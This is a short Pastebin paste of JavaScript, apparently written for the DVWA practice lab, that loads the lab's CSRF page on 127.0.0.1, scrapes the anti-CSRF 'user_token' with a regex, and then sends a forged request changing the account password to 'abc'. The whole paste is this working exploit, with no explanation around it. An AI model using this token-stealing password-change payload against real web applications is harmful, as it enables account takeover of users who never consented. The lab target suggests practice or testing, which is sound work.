SHARE
TWEET

Untitled

a guest Oct 23rd, 2019 87 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var http = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
  2. http.open("GET","https://127.0.0.1/vulnerabilities/csrf/", false)
  3. http.send()
  4. var text = http.responseText;
  5. console.log(text)
  6. var matches = /name='user_token' value='(.*)'/.exec(text);
  7. var token = matches[1]
  8. console.log(token)
  9.  
  10.  
  11.  
  12. var http2 = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
  13. http2.open("GET","https://127.0.0.1/vulnerabilities/csrf/?password_new=abc&password_conf=abc&Change=Change&user_token=" + token, false)
  14. http2.send()
  15. console.log(http2.responseText)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top